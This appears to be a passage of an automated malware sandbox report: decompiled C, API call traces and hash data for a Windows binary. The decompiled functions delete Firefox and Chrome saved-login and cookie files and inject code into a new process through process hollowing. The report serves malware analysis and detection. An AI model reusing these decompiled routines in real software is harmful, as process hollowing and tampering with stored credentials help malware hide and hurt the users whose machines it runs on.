                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                        • getenv.MSVCRT ref: 00407558
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                        • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite

                                        C-Code - Quality: 16%
                                        			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
                                        				char _v5;
                                        				void* _v12;
                                        				char _v13;
                                        				char _v14;
                                        				void* _v32;
                                        				char _v48;
                                        				short _v64;
                                        				char _v80;
                                        				char _v96;
                                        				void* _v112;
                                        				char _v128;
                                        				char _v144;
                                        				struct _WIN32_FIND_DATAW _v736;
                                        				char* _t73;
                                        				struct _WIN32_FIND_DATAW* _t75;
                                        				void* _t79;
                                        				void* _t81;
                                        				signed int _t96;
                                        				intOrPtr* _t137;
                                        				void* _t139;
                                        				void* _t141;
                                        				signed int _t145;
                                        
                                        				_t137 = __ecx;
                                        				_t60 =  &_v5;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                        				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
                                        				L00414146();
                                        				_t141 = _t139 + 0x1c;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
                                        				_v12 = FindFirstFileW( &_v64,  &_v64);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v12 == 0xffffffff) {
                                        					L11:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					return 1;
                                        				}
                                        				while(FindNextFileW(_v12,  &_v736) != 0) {
                                        					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                        						L0041414C();
                                        						L00414152();
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                        						_t141 = _t141 + 0x18;
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                        						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					}
                                        					_t71 =  &(_v736.cFileName);
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
                                        					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
                                        					_t141 = _t141 + 0x10;
                                        					_t73 =  &_a20;
                                        					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
                                        					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                        						L8:
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        						continue;
                                        					} else {
                                        						_t75 =  &_v736;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
                                        						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						_t145 = _t141 - 0x10;
                                        						_t96 = _t145;
                                        						_t79 = E00412855( &_v80,  &_v128,  &_a4);
                                        						_t80 =  &_v96;
                                        						L00414140();
                                        						L00414140();
                                        						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79,  &E0041B310);
                                        						_t141 = _t145 + 0x30;
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
                                        							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        							return 0;
                                        						}
                                        						goto L8;
                                        					}
                                        				}
                                        				FindClose(_v12);
                                        				goto L11;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                        • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                        • wcscmp.MSVCRT ref: 00404CCA
                                        • wcscmp.MSVCRT ref: 00404CE2
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                          • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                        • String ID:
                                        • API String ID: 1504175218-0
                                        • Opcode ID: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                        • Opcode Fuzzy Hash: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E0040F219() {
                                        				void* _t59;
                                        				void* _t60;
                                        				void _t71;
                                        				void* _t72;
                                        				signed int _t74;
                                        				CONTEXT* _t80;
                                        				intOrPtr _t85;
                                        				intOrPtr* _t93;
                                        				signed int _t95;
                                        				void* _t100;
                                        				CONTEXT* _t110;
                                        				struct _PROCESS_INFORMATION* _t114;
                                        				void* _t115;
                                        				void* _t117;
                                        
                                        				L00413ECA();
                                        				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                        				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                        				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                        				_t59 =  *(_t115 + 0xc);
                                        				 *(_t115 - 0x74) = _t59;
                                        				if( *_t59 != 0x5a4d) {
                                        					L16:
                                        					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                        					_t60 = 0;
                                        				} else {
                                        					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                        					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                        					if( *_t93 != 0x4550) {
                                        						goto L16;
                                        					} else {
                                        						_t95 = 0x11;
                                        						memset(_t115 - 0x60, 0, _t95 << 2);
                                        						_t114 =  *(_t115 + 0x10);
                                        						asm("stosd");
                                        						asm("stosd");
                                        						asm("stosd");
                                        						asm("stosd");
                                        						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
                                        							goto L16;
                                        						} else {
                                        							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                        							 *(_t115 - 0x70) = _t110;
                                        							_t110->ContextFlags = 0x10007;
                                        							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
                                        								goto L16;
                                        							} else {
                                        								_t71 =  *(_t115 - 0x1c);
                                        								if(_t71 ==  *(_t93 + 0x34)) {
                                        									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
                                        								}
                                        								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
                                        								 *(_t115 - 0x6c) = _t72;
                                        								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
                                        									goto L16;
                                        								} else {
                                        									_t74 = 0;
                                        									 *(_t115 - 0x64) = 0;
                                        									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                        										_t100 =  *(_t115 + 0xc);
                                        										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                        										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                        										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
                                        										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                        										_t74 =  *(_t115 - 0x64);
                                        									}
                                        									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
                                        										goto L16;
                                        									} else {
                                        										_t80 =  *(_t115 - 0x70);
                                        										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                        										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
                                        											goto L16;
                                        										} else {
                                        											_t60 = 1;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                        				return _t60;
                                        			}

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 0040F21E
                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                        • CreateProcessW.KERNEL32 ref: 0040F294
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                        • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                        • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                        • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                        • API String ID: 65594003-1050664331
                                        • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                        • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 32%
                                        			E0040710F() {
                                        				char _v5;
                                        				char _v6;
                                        				char _v24;
                                        				void* _v40;
                                        				char* _t12;
                                        				CHAR* _t13;
                                        				long _t20;
                                        				char* _t21;
                                        				void* _t25;
                                        
                                        				_t12 = getenv("UserProfile");
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                        				_t13 =  &_v24;
                                        				L00414170();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				if(DeleteFileA(_t13) != 0) {
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                        					E00407A90("\n[Chrome StoredLogins found, cleared!]");
                                        					_t25 = 1;
                                        					L8:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return _t25;
                                        				}
                                        				_t20 = GetLastError();
                                        				if(_t20 == 0) {
                                        					_t21 =  &_v6;
                                        					L5:
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                        					E00407A90("\n[Chrome StoredLogins not found]");
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return 1;
                                        				}
                                        				if(_t20 == 1) {
                                        					_t21 =  &_v5;
                                        					goto L5;
                                        				}
                                        				_t25 = 0;
                                        				goto L8;
                                        			}

                                        APIs
                                        • getenv.MSVCRT ref: 00407124
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                        • GetLastError.KERNEL32 ref: 0040715F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
